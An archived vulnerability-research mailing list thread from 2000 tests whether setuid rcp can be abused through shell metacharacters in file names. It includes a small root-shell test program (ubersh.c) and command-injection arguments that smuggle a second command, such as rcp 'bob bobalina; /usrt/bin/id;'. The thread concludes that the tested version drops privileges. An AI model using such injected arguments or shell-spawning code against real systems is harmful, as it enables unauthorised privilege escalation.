Vulnerability Development mailing list archives
Re: possible rcp hole...
From: H D Moore <hdm () SECUREAUSTIN COM>
Date: Wed, 22 Nov 2000 00:05:32 -0600
On SuSE 6.4 rcp is not vulnerable. I replaced /bin/sh with this program:
--- ubersh.c ---
#include <stdio.h>
#include <stdlib.h>
int main (int argc, char **argv)
{
setuid(0);
seteuid(0);
setreuid(0);
execl("/bin/bash", "uber shell", "-i", NULL);
printf("exiting root shell...\n");
return 0;
}
--------------
The rcp program executed my shell with:
$ rcp 'file1 file2;' 127.0.0.1
Which dopped me into the ubersh, where my privs were still that of my user
account. I am pretty sure rcp drops privs before calling anything (only uses
it for the port bindings), let alone system, or we would have heard something
about this before.
This is still a cool hole if you can find some custom/scripted system that
does rcp backups from user-writable directories. You could gain access as
whatever user the backups ran as (likely to be priviledged).
-HD
http://www.digitaldefense.net
http://www.digitaloffense.net
On Tuesday 21 November 2000 04:11 pm, Andrew Griffiths wrote:
Here is a possible bug in rcp; since I think it calls system(). I haven't had much time to play with this, because exama are coming up. It is negated because system() calls /bin/cp which with the newer versions of bash, it drops it's effective credientals... $ ls -alF `which rcp` -rwsr-xr-x 1 root root 14492 Jul 21 22:43 /usr/sbin/rcp $ cd /tmp $ echo bla > bob $ rcp 'bob bobalina; /usrt/bin/id;' 127.0.0.1 uid=500(andrewg) gid=500(andrewg) groups=500(andrewg) sh: 127.0.0.1: command not found. Now doing a quick ltrace - it doesn't remove ; and ` and other fun stuff. This could probably be exploited, on older bash bersions?
Current thread:
- possible rcp hole... Andrew Griffiths (Nov 22)
- Re: possible rcp hole... Luciano Miguel Ferreira Rocha (Nov 23)
- Re: possible rcp hole... H D Moore (Nov 25)
- Re: possible rcp hole... Joe (Nov 27)
